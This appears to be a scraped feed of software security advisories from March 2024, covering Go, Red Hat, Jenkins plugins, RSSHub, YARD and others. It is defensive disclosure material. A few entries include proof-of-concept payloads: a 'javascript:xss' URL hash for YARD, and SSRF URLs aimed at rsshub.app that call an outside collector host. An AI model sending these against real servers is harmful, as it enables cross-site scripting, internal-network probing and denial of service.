https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0019
04.03.2024 12:52:07	rubysec	[RUBYSEC:JSON-JWT-2023-51774] json-jwt allows bypass of identity checks via a sign/encryption confusion attack	The json-jwt (aka JSON::JWT) gem versions 1.16.5 and below sometimes allowsbypass of identity checks via a sign/encryption confusion attack.For example, JWE can sometimes be used to bypass JSON::JWT.decode.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:JSON-JWT-2023-51774
04.03.2024 19:26:03	maven	[MAVEN:GHSA-P5Q9-86W4-2XR5] SMTP smuggling in Apache James (moderate)	Apache James prior to versions 3.8.1 and 3.7.5 is vulnerable to SMTP smuggling.A lenient behaviour in line delimiter handling might create a difference of interpretation between the sender and the receiver which can be exploited by an attacker to forge an SMTP envelop, allowing for instance to bypass SPF checks.The patch implies enforcement of CRLF as a line delimiter as part of the DATA transaction.We recommend James users to upgrade to non vulnerable versions.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-P5Q9-86W4-2XR5
05.03.2024 00:42:13	rubysec	[RUBYSEC:RACK-CORS-2024-27456] Rack CORS Middleware has Insecure File Permissions	rack-cors (aka Rack CORS Middleware) 2.0.1 has 0666 permissionsfor the .rb files.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RACK-CORS-2024-27456
04.03.2024 02:00:00	freebsd	[FREEBSD:0EF3398E-DA21-11EE-B23A-080027A5B8E9] Django -- multiple vulnerabilities	Django reports: CVE-2024-27351: Potential regular expression denial-of-service in django.utils.text.Truncator.words().	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:0EF3398E-DA21-11EE-B23A-080027A5B8E9
05.03.2024 23:34:20	go	[GO-2024-2610] Errors returned from JSON marshaling may break template escaping inhtml/template	If errors returned from MarshalJSON methods contain user controlled data, theymay be used to break the contextual auto-escaping behavior of the html/templatepackage, allowing for subsequent actions to inject unexpected content intotemplates.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2610
05.03.2024 23:34:11	go	[GO-2024-2609] Comments in display names are incorrectly handled in net/mail	The ParseAddressList function incorrectly handles comments (text withinparentheses) within display names. Since this is a misalignment with conformingaddress parsers, it can result in different trust decisions being made byprograms using different parsers.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2609
05.03.2024 23:34:02	go	[GO-2024-2600] Incorrect forwarding of sensitive headers and cookies on HTTP redirect innet/http	When following an HTTP redirect to a domain which is not a subdomain match orexact match of the initial domain, an http.Client does not forward sensitiveheaders such as "Authorization" or "Cookie". For example, a redirect fromfoo.com to www.foo.com will forward the Authorization header, but a redirect tobar.com will not.A maliciously crafted HTTP redirect could cause sensitive headers to beunexpectedly forwarded.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2600
05.03.2024 23:33:49	go	[GO-2024-2599] Memory exhaustion in multipart form parsing in net/textproto and net/http	When parsing a multipart form (either explicitly with Request.ParseMultipartFormor implicitly with Request.FormValue, Request.PostFormValue, orRequest.FormFile), limits on the total size of the parsed form were not appliedto the memory consumed while reading a single form line. This permits amaliciously crafted input containing very long lines to cause allocation ofarbitrarily large amounts of memory, potentially leading to memory exhaustion.With fix, the ParseMultipartForm function now correctly limits the maximum sizeof form lines.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2599
05.03.2024 23:33:39	go	[GO-2024-2598] Verify panics on certificates with an unknown public key algorithm incrypto/x509	Verifying a certificate chain which contains a certificate with an unknownpublic key algorithm will cause Certificate.Verify to panic.This affects all crypto/tls clients, and servers that set Config.ClientAuth toVerifyClientCertIfGiven or RequireAndVerifyClientCert. The default behavior isfor TLS servers to not verify client certificates.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2598
05.03.2024 23:23:09	slackware	[SSA:2024-065-01] mozilla-thunderbird	New mozilla-thunderbird packages are available for Slackware 15.0 and -currentto fix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-thunderbird-115.8.1-i686-1_slack15.0.txz: Upgraded. This release contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/thunderbird/115.8.1/releasenotes/ https://www.mozilla.org/en-US/security/advisories/mfsa2024-11/ https://www.cve.org/CVERecord?id=CVE-2024-1936 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.8.1-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.8.1-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-115.8.1-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-115.8.1-x86_64-1.txzMD5 signaturesSlackware 15.0 package:a0fa5c1ccacab43f8c3f607e231840f3 mozilla-thunderbird-115.8.1-i686-1_slack15.0.txzSlackware x86_64 15.0 package:08089e8a210cf2ea4cb4beedb0f36c04 mozilla-thunderbird-115.8.1-x86_64-1_slack15.0.txzSlackware -current package:b8d025d0f32492718a184b06094bebc4 xap/mozilla-thunderbird-115.8.1-i686-1.txzSlackware x86_64 -current package:0d3c09a79ae6d5623f5d1b2ae9a50cb4 xap/mozilla-thunderbird-115.8.1-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-thunderbird-115.8.1-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-065-01
05.03.2024 21:49:11	go	[GO-2024-2611] Infinite loop in JSON unmarshaling in google.golang.org/protobuf	The protojson.Unmarshal function can enter an infinite loop when unmarshalingcertain forms of invalid JSON. This condition can occur when unmarshaling into amessage which contains a google.protobuf.Any value, or when theUnmarshalOptions.DiscardUnknown option is set.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2611
05.03.2024 20:46:35	ubuntu	[USN-6678-1] libgit2 vulnerabilities (critical)	Several security issues were fixed in libgit2.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6678-1
05.03.2024 20:39:19	ubuntu	[USN-6677-1] libde265 vulnerabilities (high)	Several security issues were fixed in libde265.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6677-1
05.03.2024 18:24:32	npm	[NPM:GHSA-86FC-F9GR-V533] HTTP Handling Vulnerability in the Bare server (critical)	### ImpactThis vulnerability relates to insecure handling of HTTP requests by the @tomphttp/bare-server-node package. This flaw potentially exposes the users of the package to manipulation of their web traffic. The impact may vary depending on the specific usage of the package but it can potentially affect any system where this package is in use.### PatchesYes, the problem has been patched. We advise all users to upgrade to version @tomphttp/bare-server-node@2.0.2 as soon as possible.### WorkaroundsGiven the nature of the vulnerability, the most effective solution is to upgrade to the patched version of the package. Specific workaround strategies will be disclosed later due to security considerations.### ReferencesFurther information about this vulnerability will be provided at a later date to provide users with an opportunity to upgrade to a patched version and to prevent potential exploitation of the vulnerability. Users are advised to follow the repository announcements and updates.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-86FC-F9GR-V533
05.03.2024 17:57:04	ubuntu	[USN-6675-1] ImageProcessing vulnerability (critical)	ImageProcessing could be made to crash or run programs as an administratorif it received specially crafted input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6675-1
05.03.2024 02:00:00	cisa	[CISA-2024:0305] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (critical)	CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0305
05.03.2024 02:00:00	redhat	[RHSA-2024:1075] edk2 security update (important)	EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Security Fix(es):* edk2: Buffer overflow in the DHCPv6 client via a long Server ID option (CVE-2023-45230)* edk2: Buffer overflow when processing DNS Servers option in a DHCPv6 Advertise message (CVE-2023-45234)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1075
05.03.2024 02:00:00	redhat	[RHSA-2024:1129] curl security update (moderate)	The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.Security Fix(es):* curl: information disclosure by exploiting a mixed case flaw (CVE-2023-46218)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1129
05.03.2024 02:00:00	redhat	[RHSA-2024:1130] openssh security update (moderate)	OpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.Security Fix(es):* ssh: Prefix truncation attack on Binary Packet Protocol (BPP) (CVE-2023-48795)* openssh: potential command injection via shell metacharacters (CVE-2023-51385)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1130
05.03.2024 02:00:00	redhat	[RHSA-2024:1131] golang security update (moderate)	The golang packages provide the Go programming language compiler.Security Fix(es):* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)* golang: cmd/go: Protocol Fallback when fetching modules (CVE-2023-45285)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1131
05.03.2024 02:00:00	redhat	[RHSA-2024:1134] tomcat security update (important)	Apache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.Security Fix(es):* tomcat: HTTP request smuggling via malformed trailer headers (CVE-2023-46589)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1134
05.03.2024 02:00:00	redhat	[RHSA-2024:1139] keylime security update (low)	Keylime is a TPM based highly scalable remote boot attestation and runtime integrity measurement solution.Security Fix(es):* keylime: Attestation failure when the quote's signature does not validate (CVE-2023-3674)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1139
05.03.2024 02:00:00	redhat	[RHSA-2024:1142] haproxy security update (moderate)	The haproxy packages provide a reliable, high-performance network load balancer for TCP and HTTP-based applications.Security Fix(es):* haproxy: Proxy forwards malformed empty Content-Length headers (CVE-2023-40225)* haproxy: untrimmed URI fragments may lead to exposure of confidential data on static servers (CVE-2023-45539)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1142
05.03.2024 02:00:00	redhat	[RHSA-2024:1147] rear security update (moderate)	Relax-and-Recover is a recovery and system migration utility. The utility produces a bootable image and restores from backup using this image. It allows to restore to different hardware and can therefore be also used as a migration utility.Security Fix(es):* rear: creates a world-readable initrd (CVE-2024-23301)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1147
05.03.2024 02:00:00	redhat	[RHSA-2024:1149] skopeo security update (moderate)	The skopeo command lets you inspect images from container image registries, get images and image layers, and use signatures to create and verify files. Security Fix(es):* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1149
05.03.2024 02:00:00	redhat	[RHSA-2024:1150] buildah security update (moderate)	The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images. Security Fix(es):* ssh: Prefix truncation attack on Binary Packet Protocol (BPP) (CVE-2023-48795)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1150
05.03.2024 02:00:00	redhat	[RHSA-2024:1141] mysql security update (moderate)	MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries.Security Fix(es):* mysql: InnoDB unspecified vulnerability (CPU Apr 2023) (CVE-2023-21911)* mysql: Server: DDL unspecified vulnerability (CPU Apr 2023) (CVE-2023-21919, CVE-2023-21929, CVE-2023-21933)* mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2023) (CVE-2023-21920, CVE-2023-21935, CVE-2023-21945, CVE-2023-21946, CVE-2023-21976, CVE-2023-21977, CVE-2023-21982)* mysql: Server: Components Services unspecified vulnerability (CPU Apr 2023) (CVE-2023-21940, CVE-2023-21947, CVE-2023-21962)* mysql: Server: Partition unspecified vulnerability (CPU Apr 2023) (CVE-2023-21953)* mysql: Server: Partition unspecified vulnerability (CPU Apr 2023) (CVE-2023-21955)* mysql: Server: JSON unspecified vulnerability (CPU Apr 2023) (CVE-2023-21966)* mysql: Server: DML unspecified vulnerability (CPU Apr 2023) (CVE-2023-21972)* mysql: Client programs unspecified vulnerability (CPU Apr 2023) (CVE-2023-21980)* mysql: Server: Replication unspecified vulnerability (CPU Jul 2023) (CVE-2023-22005, CVE-2023-22007, CVE-2023-22057)* mysql: InnoDB unspecified vulnerability (CPU Jul 2023) (CVE-2023-22008)* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2023) (CVE-2023-22032, CVE-2023-22059, CVE-2023-22064, CVE-2023-22065, CVE-2023-22070, CVE-2023-22078, CVE-2023-22079, CVE-2023-22092, CVE-2023-22103, CVE-2023-22110, CVE-2023-22112)* mysql: InnoDB unspecified vulnerability (CPU Jul 2023) (CVE-2023-22033)* mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2023) (CVE-2023-22046)* mysql: Client programs unspecified vulnerability (CPU Jul 2023) (CVE-2023-22053, CVE-2023-22054, CVE-2023-22056)* mysql: Server: DDL unspecified vulnerability (CPU Jul 2023) (CVE-2023-22058)* mysql: InnoDB unspecified vulnerability (CPU Oct 2023) (CVE-2023-22066, CVE-2023-22068, CVE-2023-22084, CVE-2023-22097, CVE-2023-22104, CVE-2023-22114)* mysql: Server: UDF unspecified vulnerability (CPU Oct 2023) (CVE-2023-22111)* mysql: Server: DML unspecified vulnerability (CPU Oct 2023) (CVE-2023-22115)* mysql: Server: RAPID unspecified vulnerability (CPU Jan 2024) (CVE-2024-20960)* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2024) (CVE-2024-20961, CVE-2024-20962, CVE-2024-20965, CVE-2024-20966, CVE-2024-2097, CVE-2024-20971, CVE-2024-20972, CVE-2024-20973, CVE-2024-20974, CVE-2024-20976, CVE-2024-20977, CVE-2024-20978, CVE-2024-20982)* mysql: Server: Security: Encryption unspecified vulnerability (CPU Jan 2024) (CVE-2024-20963)* mysql: Server: Security: Privileges unspecified vulnerability (CPU Jan 2024) (CVE-2024-20964)* mysql: Server: Replication unspecified vulnerability (CPU Jan 2024) (CVE-2024-20967)* mysql: Server: Options unspecified vulnerability (CPU Jan 2024) (CVE-2024-20968)* mysql: Server: DDL unspecified vulnerability (CPU Jan 2024) (CVE-2024-20969)* mysql: Server: DDL unspecified vulnerability (CPU Jan 2024) (CVE-2024-20981)* mysql: Server: DML unspecified vulnerability (CPU Jan 2024) (CVE-2024-20983)* mysql: Server : Security : Firewall unspecified vulnerability (CPU Jan 2024) (CVE-2024-20984)* mysql: Server: UDF unspecified vulnerability (CPU Jan 2024) (CVE-2024-20985)* zstd: mysql: buffer overrun in util.c (CVE-2022-4899)* mysql: Server: Security: Privileges unspecified vulnerability (CPU Jul 2023) (CVE-2023-22038)* mysql: Server: Pluggable Auth unspecified vulnerability (CPU Jul 2023) (CVE-2023-22048)* mysql: Server: Security: Encryption unspecified vulnerability (CPU Oct 2023) (CVE-2023-22113)Bug Fix(es):* Fix for MySQL bug #33630199 in 8.0.32 introduces regression when --set-gtid-purged=OFF (RHEL-22454)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1141
06.03.2024 01:05:54	maven	[MAVEN:GHSA-VR64-R9QJ-H27F] Reading specially crafted serializable objects from an untrusted source may cause an infinite loop and denial of service (moderate)	Any program on the JVM may read serialized objects via [java.io.ObjectInputStream.readObject()](https://docs.oracle.com/javase/8/docs/api/java/io/ObjectInputStream.html#readObject--). Reading serialized objects from an untrusted source is inherently unsafe (this affects any program running on any version of the JVM) and is a prerequisite for this vulnerability.Clojure classes that represent infinite seqs (Cycle, infinite Repeat, and Iterate) do not define hashCode() and use the parent ASeq.hashCode(), which walks the seq to compute the hash, yielding an infinite loop. Classes like java.util.HashMap call hashCode() on keys during deserialization of a serialized map. The exploit requires:1. Crafting a serialized HashMap object with an infinite seq object as a key.2. Sending that to a program that reads serialized objects via ObjectInputStream.readObject().This will cause the program to enter an infinite loop on the reading thread and thus a denial of service (DoS).The affected Clojure classes (Cycle, Repeat, Iterate) exist in Clojure 1.2.0-1.12.0-alpha8.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-VR64-R9QJ-H27F
05.03.2024 03:31:53	rustsec	[RUSTSEC-2024-0020] Stack buffer overflow with whoami on illumos and Solaris	With older versions of the whoami crate, calling the `username` function leads to an immediate stackbuffer overflow on illumos and Solaris. Denial of service and data corruption have both beenobserved in the wild, and the issue is possibly exploitable as well.This also affects any other Unix platforms that aren't any of: `linux`, `macos`, `freebsd`,`dragonfly`, `bitrig`, `openbsd`, `netbsd`.This issue has been addressed in whoami 1.5.0.For more information, see [this GitHub issue](https://github.com/ardaku/whoami/issues/91).	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0020
05.03.2024 20:43:56	rubysec	[RUBYSEC:YARD-2024-27285] YARD's default template vulnerable to Cross-site Scripting in generated frames.html (medium)	### SummaryThe "frames.html" file within the Yard Doc's generated documentationis vulnerable to Cross-Site Scripting (XSS) attacks due to inadequatesanitization of user input within the JavaScript segment of the"frames.erb" template file.### DetailsThe vulnerability stems from mishandling user-controlled data retrievedfrom the URL hash in the embedded JavaScript code within the "frames.erb"template file. Specifically, the script lacks proper sanitization ofthe hash data before utilizing it to establish the top-level window'slocation. This oversight permits an attacker to inject maliciousJavaScript payloads through carefully crafted URLs.Snippet from "frames.erb":(v0.9.34)```erb<script type="text/javascript"> var match = unescape(window.location.hash).match(/^#!(.+)/); var name = match ? match[1] : '<%= url_for_main %>'; name = name.replace(/^(\w+):\/\//, '').replace(/^\/\//, ''); window.top.location = name;</script>```(v0.9.35)```erb<script type="text/javascript"> var match = decodeURIComponent(window.location.hash).match(/^#!(.+)/); var name = match ? match[1] : '<%= url_for_main %>'; name = name.replace(/^((\w):)?[\/\\]/gm, '').trim(); window.top.location.replace(name)</script>```### PoC (Proof of Concept)To exploit this vulnerability:1. Gain access to the generated Yard Doc.2. Locate and access the "frames.html" file.3. Construct a URL containing the malicious payload in the hash segment, for instance: `#!javascript:xss` for v0.9.34, and `#:javascript:xss` for v0.9.35### ImpactThis XSS vulnerability presents a substantial threat by enablingan attacker to execute arbitrary JavaScript code within the user'ssession context. Potential ramifications include session hijacking,theft of sensitive data, unauthorized access to user accounts, anddefacement of websites. Any user visiting the compromised page issusceptible to exploitation. It is critical to promptly addressthis vulnerability to mitigate potential harm to users and preservethe application's integrity.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:YARD-2024-27285
06.03.2024 22:17:21	maven	[MAVEN:GHSA-8H2M-54WH-GWJ3] Jenkins docker-build-step Plugin missing permission check (moderate)	A missing permission check in an HTTP endpoint in Jenkins docker-build-step Plugin 2.11 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified TCP or Unix socket URL, and to reconfigure the plugin using the provided connection test parameters, affecting future build step executions.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8H2M-54WH-GWJ3
06.03.2024 22:16:53	maven	[MAVEN:GHSA-64C5-R2H5-C2FG] Jenkins docker-build-step Plugin Cross-Site Request Forgery vulnerability (moderate)	A cross-site request forgery (CSRF) vulnerability in Jenkins docker-build-step Plugin 2.11 and earlier allows attackers to connect to an attacker-specified TCP or Unix socket URL, and to reconfigure the plugin using the provided connection test parameters, affecting future build step executions.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-64C5-R2H5-C2FG
06.03.2024 22:15:46	maven	[MAVEN:GHSA-PFH3-J79R-VQRJ] Jenkins Delphix Plugin has improper SSL/TLS certificate validation (moderate)	In Jenkins Delphix Plugin 3.0.1 through 3.1.0 (both inclusive) a global option for administrators to enable or disable SSL/TLS certificate validation for Data Control Tower (DCT) connections fails to take effect until Jenkins is restarted when switching from disabled validation to enabled validation.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-PFH3-J79R-VQRJ
06.03.2024 22:14:36	maven	[MAVEN:GHSA-XJ36-6XC6-8P9X] Jenkins Delphix Plugin has SSL/TLS certificate validation disabled by default (moderate)	In Jenkins Delphix Plugin 3.0.1, a global option for administrators to enable or disable SSL/TLS certificate validation for Data Control Tower (DCT) connections is disabled by default.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XJ36-6XC6-8P9X
06.03.2024 22:13:57	maven	[MAVEN:GHSA-2PC2-H97H-2MMW] Jenkins iceScrum Plugin vulnerable to stored Cross-site Scripting (high)	Jenkins iceScrum Plugin 1.1.6 and earlier does not sanitize iceScrum project URLs on build views, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure jobs.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2PC2-H97H-2MMW
06.03.2024 21:37:27	maven	[MAVEN:GHSA-MR9J-QQJH-67F2] Jenkins Subversion Partial Release Manager Plugin missing permission check (moderate)	A missing permission check in Jenkins Subversion Partial Release Manager Plugin 1.0.1 and earlier allows attackers with Item/Read permission to trigger a build.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-MR9J-QQJH-67F2
06.03.2024 21:36:54	maven	[MAVEN:GHSA-RV35-69FF-G9GV] Jenkins Subversion Partial Release Manager Plugin vulnerable to Cross-Site Request Forgery (moderate)	A cross-site request forgery (CSRF) vulnerability in Jenkins Subversion Partial Release Manager Plugin 1.0.1 and earlier allows attackers to trigger a build.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RV35-69FF-G9GV
06.03.2024 21:33:38	maven	[MAVEN:GHSA-5J74-G3C5-WQWW] Jenkins GitBucket Plugin vulnerable to stored Cross-site Scripting (high)	Jenkins GitBucket Plugin 0.8 and earlier does not sanitize Gitbucket URLs on build views, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure jobs.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5J74-G3C5-WQWW
06.03.2024 21:31:41	maven	[MAVEN:GHSA-5J5R-6MV9-M255] Jenkins Build Monitor View Plugin vulnerable to stored Cross-site Scripting (high)	Jenkins Build Monitor View Plugin 1.14-860.vd06ef2568b_3f and earlier does not escape Build Monitor View names, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure Build Monitor Views.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5J5R-6MV9-M255
06.03.2024 21:28:32	maven	[MAVEN:GHSA-XXV9-W5HM-328J] Jenkins AppSpider Plugin missing permission checks (moderate)	Jenkins AppSpider Plugin 1.0.16 and earlier does not perform permission checks in several HTTP endpoints, allowing attackers with Overall/Read permission to obtain information about available scan config names, engine group names, and client names.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XXV9-W5HM-328J
06.03.2024 21:21:35	maven	[MAVEN:GHSA-8FM4-R23P-V68V] Jenkins MQ Notifier Plugin exposes sensitive information in build logs (moderate)	Jenkins MQ Notifier Plugin 1.4.0 and earlier logs potentially sensitive build parameters as part of debug information in build logs by default.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8FM4-R23P-V68V
06.03.2024 21:20:58	maven	[MAVEN:GHSA-M4RM-X2RR-357W] Jenkins Bitbucket Branch Source Plugin has incorrect trust policy behavior for pull requests (moderate)	In Jenkins Bitbucket Branch Source Plugin 866.vdea_7dcd3008e and earlier, except 848.850.v6a_a_2a_234a_c81, when discovering pull requests from forks, the trust policy "Forks in the same account" allows changes to Jenkinsfiles from users without write access to the project when using Bitbucket Server.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-M4RM-X2RR-357W
06.03.2024 21:09:04	maven	[MAVEN:GHSA-9PP4-MX6X-XH36] Jenkins OWASP Dependency-Check Plugin has stored XSS vulnerability (high)	Jenkins OWASP Dependency-Check Plugin 5.4.5 and earlier does not escape vulnerability metadata from Dependency-Check reports, resulting in a stored cross-site scripting (XSS) vulnerability.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9PP4-MX6X-XH36
06.03.2024 21:08:43	maven	[MAVEN:GHSA-XRRW-9J78-HPF3] Jenkins HTML Publisher Plugin Stored XSS vulnerability (high)	Jenkins HTML Publisher Plugin 1.32 and earlier does not escape job names, report names, and index page titles shown as part of the report frame, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XRRW-9J78-HPF3
06.03.2024 21:07:41	maven	[MAVEN:GHSA-8VCG-V7G4-3VR7] Jenkins HTML Publisher Plugin does not properly sanitize input (high)	Jenkins HTML Publisher Plugin 1.16 through 1.32 (both inclusive) does not properly sanitize input, allowing attackers with Item/Configure permission to implement cross-site scripting (XSS) attacks and to determine whether a path on the Jenkins controller file system exists.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8VCG-V7G4-3VR7
06.03.2024 19:03:13	npm	[NPM:GHSA-3P3P-CGJ7-VGW3] RSSHub vulnerable to Server-Side Request Forgery (moderate)	### SummaryServeral Server-Side Request Forgery (SSRF) vulnerabilities in RSSHub allow remote attackers to use the server as a proxy to send HTTP GET requests to arbitrary targets and retrieve information in the internal network or conduct Denial-of-Service (DoS) attacks.### Details#### `/mastodon/acct/:acct/statuses/:only_media?`https://github.com/DIYgod/RSSHub/blob/5928c5db2472e101c2f5c3bafed77a2f72edd40a/lib/routes/mastodon/acct.js#L4-L7https://github.com/DIYgod/RSSHub/blob/5928c5db2472e101c2f5c3bafed77a2f72edd40a/lib/routes/mastodon/utils.js#L85-L105#### `/zjol/paper/:id?`https://github.com/DIYgod/RSSHub/blob/172f6cfd2b69ea6affdbdedf61e6dde1671f3796/lib/routes/zjol/paper.js#L7-L13#### `/m4/:id?/:category*`https://github.com/DIYgod/RSSHub/blob/172f6cfd2b69ea6affdbdedf61e6dde1671f3796/lib/routes/m4/index.js#L10-L14### PoC- https://rsshub.app/mastodon/acct/test@a6wt15r2.requestrepo.com%23/statuses- https://rsshub.app/zjol/paper/a6wt15r2.requestrepo.com%23- https://rsshub.app/m4/a6wt15r2.requestrepo.com%23/test### ImpactThe attacker can send malicious requests to a RSSHub server, to make the server send HTTP GET requests to arbitrary destinations and see partial responses. This may lead to:1. Leak the server IP address, which could be hidden behind a CDN.2. Retrieve information in the internal network. e.g. which addresses/ports are accessible, the titles and meta descriptions of HTML pages.3. DoS amplification. The attacker could request the server to download some large files, or chain several SSRF requests in a single attacker request: `https://rsshub.a.com/zjol/paper/rsshub.b.net%2Fzjol%2Fpaper%2Frsshub.a.com%252Fzjol%252Fpaper%252Frsshub.b.net%25252Fzjol%25252Fpaper%25252Frsshub.a.com%2525252Fzjol%2525252Fpaper%2525252Fexample.com%2525252523%25252523%252523%2523%23`.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3P3P-CGJ7-VGW3
06.03.2024 19:02:34	npm	[NPM:GHSA-2WQW-HR4F-XRHH] RSSHub Cross-site Scripting vulnerability caused by internal media proxy (moderate)	## ImpactWhen the specially crafted image is supplied to the internal media proxy, it proxies the image without handling XSS vulnerabilities, allowing for the execution of arbitrary JavaScript code.Users who access the deliberately constructed URL are affected.## PatchesThis vulnerability was fixed in version https://github.com/DIYgod/RSSHub/commit/4d3e5d79c1c17837e931b4cd253d2013b487aa87. Please upgrade to this or a later version.## WorkaroundsNo.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2WQW-HR4F-XRHH
